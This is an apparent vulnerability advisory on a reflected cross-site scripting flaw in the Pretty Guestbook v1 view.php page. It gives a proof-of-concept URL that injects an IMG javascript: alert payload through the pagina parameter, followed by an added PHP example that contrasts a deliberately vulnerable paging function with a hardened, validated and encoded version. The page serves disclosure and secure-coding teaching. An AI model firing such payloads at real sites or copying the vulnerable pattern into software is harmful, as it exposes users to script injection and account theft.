
SECURITYVULNS:DOC:12858
History: May 27, 2006 - 12:00 a.m.

Pretty Guestbook v1

vulners.com

Homepage:
http://www.tuttophp.altervista.org/main.php

Description:
Text-based guestbook with the following features: - Data stored in a text file - Paging of messages on
screen - Blocking of messages that contain overly long words - Blocking of messages that contain HTML tags (<>) -
Validity checking of the email address

Affected files:
view.php

XSS achieved by URL injection through the pagina variable. The guestbook filters HTML tags out of posted
messages, but view.php reflects the pagina (page number) parameter into the page without validating or
encoding it:

http://www.example.com/prettyguest-ing/view.php?pagina=1<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>

Note that a javascript: URL in an IMG SRC is only executed by legacy browsers (old Internet Explorer and
Netscape); the underlying flaw is the unencoded reflection of pagina, so any other XSS payload works in the
same position in current browsers.
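The following is an added example written for this page, not Pretty Guestbook's own code (the advisory
does not include the vulnerable source). It reconstructs the pattern the advisory implies, a paging link that
echoes the pagina parameter verbatim, next to a hardened version that validates the value as an in-range
integer and HTML-encodes it on output. The function names and the page count are hypothetical.

```php
<?php
// Added example, not Pretty Guestbook's own code. Models a paging link in a
// guestbook view page that reflects the ?pagina= parameter.

// Vulnerable form (hypothetical reconstruction of the pattern in the advisory).
function pager_vulnerable(array $get): string
{
    $pagina = $get['pagina'] ?? '1';
    // Reflected verbatim: ?pagina=1<IMG SRC=...> lands in the markup unchanged.
    return '<a href="view.php?pagina=' . $pagina . '">Page ' . $pagina . '</a>';
}

// Hardened form: a page number is an integer, so validate it as one, clamp it
// to the real range, and still HTML-encode it on output.
function pager_hardened(array $get, int $totalPages): string
{
    $raw = $get['pagina'] ?? '1';
    // FILTER_VALIDATE_INT rejects "1<IMG ..." outright. A bare (int) cast would
    // also yield 1 here, but silently truncating attacker input hides the probe.
    $pagina = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => max(1, $totalPages)],
    ]);
    if ($pagina === false) {
        $pagina = 1;
    }
    // Encoding on output is the second layer; it costs nothing even for an int.
    $safe = htmlspecialchars((string) $pagina, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="view.php?pagina=' . $safe . '">Page ' . $safe . '</a>';
}

// Constructed input: the advisory's payload after URL decoding.
$payload = ['pagina' => '1<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>'];

echo pager_vulnerable($payload), PHP_EOL;   // the IMG tag reaches the browser
echo pager_hardened($payload, 5), PHP_EOL;  // falls back to page 1, no markup
```

Validating the type first (an integer page index) is what removes the bug; the htmlspecialchars call is
defence in depth for the day the parameter stops being an integer.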